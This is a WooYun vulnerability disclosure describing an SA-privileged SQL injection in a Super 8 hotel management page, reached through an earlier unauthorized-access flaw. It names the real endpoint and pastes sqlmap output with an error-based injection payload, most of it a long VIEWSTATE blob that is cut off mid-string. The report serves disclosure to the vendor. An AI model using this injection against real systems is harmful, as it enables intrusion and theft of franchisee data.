当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161569

漏洞标题:速8某处SA权限SQL注入(涉及所有加盟商信息)

相关厂商:速8酒店

漏洞作者: Aug0st

提交时间:2015-12-15 17:25

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-15: 细节已通知厂商并且等待厂商处理中
2015-12-16: 厂商已经确认,细节仅向厂商公开
2015-12-26: 细节向核心白帽子及相关领域专家公开
2016-01-05: 细节向普通白帽子公开
2016-01-15: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

rt

详细说明:

问题从这里开始: WooYun: 速8酒店某站目录遍历引起的后台管理页面越权访问
这里有个未授权访问,但是官方修复不彻底,禁止列目录了,然后直接访问这个地址:
http://mys8.super8.com.cn:81/pages/WS/News/WS_NewsManage.aspx
点高级查询随便填,抓包,

44.png


45.png


值为1的这几个参数都存在注入,
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTExOTI1NTQ4MDMPFgQeClF1ZXJ5U3RhdGULKWVTdXBlcjguRW50aXR5LkNvbW1vbi5RdWVyeVN0YXRlLCBTdXBlcjguRW50aXR5LCBWZXJzaW9uPTEuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49bnVsbAEeDk9yZGVyQ29uZGl0aW9uBRhTdGF0ZSBERVNDLFRoZU9yZGVyIERFU0MWAmYPZBYCZg9kFgICAw9kFgICBg9kFgICAw9kFggCAQ9kFgQCAQ8PFgIeB0VuYWJsZWRoZGQCCw8PFgIeDVdhdGVybWFya1RleHQFFeivt+i+k+WFpeafpeivouadoeS7tmQWAmYPZBYCAgMPFgIfAwUV6K+36L6T5YWl5p+l6K+i5p2h5Lu2ZAIDDzwrABEDAA8WDB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIqHi9Fc29mdF9fU21hcnRHcmlkVmlld19fU21hcnRSYWRpb0J1dHRvbkdyb3VwTmFtZQUWU21hcnRSYWRpb0J1dHRvbkNvbHVtbh4RSXNFbXB0eURhdGFTb3VyY2VoHg9BbGxTZWxlY3RWYWx1ZXMy9AEAAQAAAP////8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgYAAAgICQIAAAABAAAACgAAABECAAAABAAAAAYDAAAAIDU0NjQ4NDZBREVBNzREREFCNDJERDZBMTJDREJERDQxDQMLHghyb3dDb3VudAIqZAEQFgAWABYADBQrAAAWAmYPZBYiAgEPD2QWAh4Kb25kYmxjbGljawXOA2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8wJykuY2hlY2tlZCl7cmV0dXJuO31kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMCcpLmNoZWNrZWQ9IWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8wJykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDAyJGN0bDAwJywnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMCcpOxYUZg9kFgJmDxAPFgQeHkVzb2Z0X19TbWFydFJhZGlvQnV0dG9uX19WYWx1ZQUgMERBMzk5RjRBREYzNDk0QzhDOEExNUE5NUM4NEQ5NzUeB0NoZWNrZWRoFgIeBXN0eWxlBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHgRUZXh0BQExZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEh5Zac5Li06Zeo5a625YW36IKh5Lu95pyJ6ZmQ5YWs5Y+4ZAIED2QWAmYPFQEHc3h4bG1qamQCBQ9kFgJmDxUBBuW6iuWeq2QCBg9kFgJmDxUBCee7jeWFtOW4gmQCBw9kFgJmDxUBBuiDoeWpt2QCCA9kFgJmDxUBEzIwMTUtMDYtMDQgMTU6Mzc6MjNkAgkPZBYCAgEPDxYGHw4FCeW3suWuoeaguB4JRm9yZUNvbG9yCk8eBF8hU0ICBGRkAgIPD2QWAh8KBc4DaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEnKS5jaGVja2VkKXtyZXR1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xJykuY2hlY2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEnKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDMkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xJyk7FhRmD2QWAmYPEA8WBB8LBSAxMTczNzlBNkYyODI0NkFBODhENUJGOTM2MkM4NTEzOB8MaBYCHw0FCWJvcmRlcjowO2RkZAIBD2QWAmYPFgIfDgUBMmQCAg9kFgJmDxUBAGQCAw9kFgJmDxUBJOWMl+S6rOS4h+aBqeWMluWtpuWItuWTgeaciemZkOWFrOWPuGQCBA9kFgJmDxUBBmJqd2VoeGQCBQ9kFgJmDxUBCea4hea0geWJgmQCBg9kFgJmDxUBBuWMl+S6rGQCBw9kFgJmDxUBBuephuaso2QCCA9kFgJmDxUBEzIwMTUtMDgtMjggMTk6MjI6MThkAgkPZBYCAgEPDxYGHw4FCeW3suWuoeaguB8PCk8fEAIEZGQCAw8PZBYCHwoFzgNpZihkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMicpLmNoZWNrZWQpe3JldHVybjt9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzInKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMicpLmNoZWNrZWQ7X19kb1Bvc3RCYWNrKCdjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNCRjdGwwMCcsJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzInKTsWFGYPZBYCZg8QDxYEHwsFIDE2RTE2QjQ2NzcyRTRFODVBODVGN0ExOUFBQ0Y1QkVFHwxoFgIfDQUJYm9yZGVyOjA7ZGRkAgEPZBYCZg8WAh8OBQEzZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEh5Y2X6YCa5paw57qq5YWD5a6+6aaG55So5ZOB5YWs5Y+4ZAIED2QWAmYPFQEFbnR4anlkAgUPZBYCZg8VAQbluIPojYlkAgYPZBYCZg8VAQnljZfpgJrluIJkAgcPZBYCZg8VAQnmvZjmmZPnjrJkAggPZBYCZg8VARMyMDE1LTA2LTA0IDE1OjQwOjUyZAIJD2QWAgIBDw8WBh8OBQnlt7LlrqHmoLgfDwpPHxACBGRkAgQPD2QWAh8KBc4DaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzMnKS5jaGVja2VkKXtyZXR1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8zJykuY2hlY2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzMnKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDUkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8zJyk7FhRmD2QWAmYPEA8WBB8LBSAyNzU5ODA1QTAwMTc0MTdCOEIxNzRFRjcxMjcwNkFEQx8MaBYCHw0FCWJvcmRlcjowO2RkZAIBD2QWAmYPFgIfDgUBNGQCAg9kFgJmDxUBAGQCAw9kFgJmDxUBJOWxseS4nOavlOeJueeUteWtkOW3peS4muaciemZkOWFrOWPuGQCBA9kFgJmDxUBBnNkYnRkemQCBQ9kFgJmDxUBCeeUteivneacumQCBg9kFgJmDxUBCeaXpeeFp+W4gmQCBw9kFgJmDxUBCemZiOW9pumcnmQCCA9kFgJmDxUBEzIwMTUtMDYtMDQgMTU6NDA6MjVkAgkPZBYCAgEPDxYGHw4FCeW3suWuoeaguB8PCk8fEAIEZGQCBQ8PZBYCHwoFzgNpZihkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfNCcpLmNoZWNrZWQpe3JldHVybjt9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzQnKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfNCcpLmNoZWNrZWQ7X19kb1Bvc3RCYWNrKCdjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNiRjdGwwMCcsJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzQnKTsWFGYPZBYCZg8QDxYEHwsFIDJCMzBBRUVEQTU5NzQxNzA4MUZDRkM5N0RBMjBGNUM0HwxoFgIfDQUJYm9yZGVyOjA7ZGRkAgEPZBYCZg8WAh8OBQE1ZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEk5Li05rKC576O5Zu95qCH5YeG57q657uH5pyJ6ZmQ5YWs5Y+4ZAIED2QWAmYPFQEIbHltZ2J6ZnpkAgUPZBYCZg8VAQbluIPojYlkAgYPZBYCZg8VAQnkuLTmsoLluIJkAgcPZBYCZg8VAQbmrabmh79kAggPZBYCZg8VARMyMDE1LTA2LTA0IDE1OjQxOjI4ZAIJD2QWAgIBDw8WBh8OBQnlt7LlrqHmoLgfDwpPHxACBGRkAgYPD2QWAh8KBc4DaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzUnKS5jaGVja2VkKXtyZXR1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF81JykuY2hlY2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzUnKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDckY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF81Jyk7FhRmD2QWAmYPEA8WBB8LBSAzMkZFMzBEQTYzQzI0MkMxQjA0ODRERkQxQjk5RjVGQh8MaBYCHw0FCWJvcmRlcjowO2RkZAIBD2QWAmYPFgIfDgUBNmQCAg9kFgJmDxUBAGQCAw9kFgJmDxUBHuW5v+S4nOato+e+juWutuWFt+aciemZkOWFrOWPuGQCBA9kFgJmDxUBBmd6em1qamQCBQ9kFgJmDxUBBuWutuWFt2QCBg9kFgJmDxUBCeS4nOiOnuW4gmQCBw9kFgJmDxUBAGQCCA9kFgJmDxUBEzIwMTUtMDYtMDQgMTU6NTg6NTBkAgkPZBYCAgEPDxYGHw4FCeW3suWuoeaguB8PCk8fEAIEZGQCBw8PZBYCHwoFzgNpZihkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfNicpLmNoZWNrZWQpe3JldHVybjt9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzYnKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfNicpLmNoZWNrZWQ7X19kb1Bvc3RCYWNrKCdjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwOCRjdGwwMCcsJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzYnKTsWFGYPZBYCZg8QDxYEHwsFIDNFRUIwMDRCRDU5MTRCMzI5RTQ4QzhDRjUzQjUxQkY0HwxoFgIfDQUJYm9yZGVyOjA7ZGRkAgEPZBYCZg8WAh8OBQE3ZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEn5LiK5rW36Imy5b2p5b6X546v5L+d56eR5oqA5pyJ6ZmQ5YWs5Y+4ZAIED2QWAmYPFQEFc2hzY2RkAgUPZBYCZg8VAQzmtJfooaPorr7lpIdkAgYPZBYCZg8VAQbkuIrmtbdkAgcPZBYCZg8VAQnmnY7ohb7ovolkAggPZBYCZg8VARMyMDE1LTA2LTA0IDE1OjUwOjE2ZAIJD2QWAgIBDw8WBh8OBQnlt7LlrqHmoLgfDwpPHxACBGRkAggPD2QWAh8KBc4DaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzcnKS5jaGVja2VkKXtyZXR1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF83JykuY2hlY2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzcnKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDkkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF83Jyk7FhRmD2QWAmYPEA8WBB8LBSA0MEY5MjgxODA3MzI0RkYzOTdEOEQzMzdBMUU3NjlGNR8MaBYCHw0FCWJvcmRlcjowO2RkZAIBD2QWAmYPFgIfDgUBOGQCAg9kFgJmDxUBAGQCAw9kFgJmDxUBJOWMl+S6rOayg+W+t+asp+S4muWutuWFt+aciemZkOWFrOWPuGQCBA9kFgJmDxUBCGJqd2RveWpqZAIFD2QWAmYPFQEG5a625YW3ZAIGD2QWAmYPFQEG5YyX5LqsZAIHD2QWAmYPFQEJ6b6a5Yek5ZCbZAIID2QWAmYPFQETMjAxNS0wNi0wNCAxNTo1ODoyNWQCCQ9kFgICAQ8PFgYfDgUJ5bey5a6h5qC4Hw8KTx8QAgRkZAIJDw9kFgIfCgXOA2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF84JykuY2hlY2tlZCl7cmV0dXJuO31kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfOCcpLmNoZWNrZWQ9IWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF84JykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDEwJGN0bDAwJywnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfOCcpOxYUZg9kFgJmDxAPFgQfCwUgNDBGRTVBMjEzRTM4NDZDOTlBOTFGNzVDODNBQjAxNjEfDGgWAh8NBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHw4FATlkAgIPZBYCZg8VAQBkAgMPZBYCZg8VASrmna3lt57ni7zohb7lub/lkYrorr7orqHliLbkvZzmnInpmZDlhazlj7hkAgQPZBYCZg8VAQZoemx0Z2dkAgUPZBYCZg8VAQbmoIfor4ZkAgYPZBYCZg8VAQnmna3lt57luIJkAgcPZBYCZg8VAQBkAggPZBYCZg8VARMyMDE1LTA2LTA0IDE1OjMxOjQ1ZAIJD2QWAgIBDw8WBh8OBQnlt7LlrqHmoLgfDwpPHxACBGRkAgoPD2QWAh8KBc4DaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzknKS5jaGVja2VkKXtyZXR1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF85JykuY2hlY2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzknKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTEkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF85Jyk7FhRmD2QWAmYPEA8WBB8LBSA1NDY0ODQ2QURFQTc0RERBQjQyREQ2QTEyQ0RCREQ0MR8MZxYCHw0FCWJvcmRlcjowO2RkZAIBD2QWAmYPFgIfDgUCMTBkAgIPZBYCZg8VAQBkAgMPZBYCZg8VASTljJfkuqzniLHov6rmtqbkuLDnp5HmioDmnInpmZDlhazlj7hkAgQPZBYCZg8VAQhiamFkcmZramQCBQ9kFgJmDxUBDOWuiemYsuezu+e7n2QCBg9kFgJmDxUBBuWMl+S6rGQCBw9kFgJmDxUBAGQCCA9kFgJmDxUBEzIwMTUtMDYtMDQgMTU6MzQ6MjJkAgkPZBYCAgEPDxYGHw4FCeW3suWuoeaguB8PCk8fEAIEZGQCCw8PZBYCHwoF0gNpZihkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMTAnKS5jaGVja2VkKXtyZXR1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xMCcpLmNoZWNrZWQ9IWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xMCcpLmNoZWNrZWQ7X19kb1Bvc3RCYWNrKCdjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxMiRjdGwwMCcsJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEwJyk7FhRmD2QWAmYPEA8WBB8LBSA1QTU2MjE2MjhCQUU0RTU4QkMzODRCMzI3ODRENjhEQR8MaBYCHw0FCWJvcmRlcjowO2RkZAIBD2QWAmYPFgIfDgUCMTFkAgIPZBYCZg8VAQBkAgMPZBYCZg8VAR7ljJfkuqzlh6/ov4XljbDliLfmnInpmZDlhazlj7hkAgQPZBYCZg8VAQZiamt4eXNkAgUPZBYCZg8VAQnljbDliLflk4FkAgYPZBYCZg8VAQbljJfkuqxkAgcPZBYCZg8VAQnpmYjln7nkvbNkAggPZBYCZg8VARMyMDE1LTA2LTA0IDE1OjQ2OjEzZAIJD2QWAgIBDw8WBh8OBQnlt7LlrqHmoLgfDwpPHxACBGRkAgwPD2QWAh8KBdIDaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzExJykuY2hlY2tlZCl7cmV0dXJuO31kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMTEnKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMTEnKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTMkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xMScpOxYUZg9kFgJmDxAPFgQfCwUgNjEwQjQxRUY4NjdGNENBQUJDREIzRTUzNDgyNjRBODUfDGgWAh8NBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHw4FAjEyZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEq5YyX5Lqs5rqQ5pmo5Yqo5Yqb5oqA5pyv5pyN5Yqh5pyJ6ZmQ5YWs5Y+4ZAIED2QWAmYPFQEGYmp5Y2RsZAIFD2QWAmYPFQEPSVTorr7lpIcv5pyN5YqhZAIGD2QWAmYPFQEG5YyX5LqsZAIHD2QWAmYPFQEG5p2O5by6ZAIID2QWAmYPFQETMjAxNS0wOC0yOCAxOToyMDoyNGQCCQ9kFgICAQ8PFgYfDgUJ5bey5a6h5qC4Hw8KTx8QAgRkZAINDw9kFgIfCgXSA2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xMicpLmNoZWNrZWQpe3JldHVybjt9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEyJykuY2hlY2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEyJykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDE0JGN0bDAwJywnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMTInKTsWFGYPZBYCZg8QDxYEHwsFIDYxNjc2RDhEQzMwRDQxOTRBQkY1OTM4Mjg4Q0M5MUZGHwxoFgIfDQUJYm9yZGVyOjA7ZGRkAgEPZBYCZg8WAh8OBQIxM2QCAg9kFgJmDxUBAGQCAw9kFgJmDxUBMOWMl+S6rOS4reS8geS/oeivuuagh+ivhuezu+e7n+enkeaKgOaciemZkOWFrOWPuGQCBA9kFgJmDxUBCGJqenF4bmJzZAIFD2QWAmYPFQEG5qCH6K+GZAIGD2QWAmYPFQEG5YyX5LqsZAIHD2QWAmYPFQEJ5bq35ZCJ5piOZAIID2QWAmYPFQETMjAxNS0wOC0yOCAxOTowMjo1MGQCCQ9kFgICAQ8PFgYfDgUJ5bey5a6h5qC4Hw8KTx8QAgRkZAIODw9kFgIfCgXSA2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xMycpLmNoZWNrZWQpe3JldHVybjt9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEzJykuY2hlY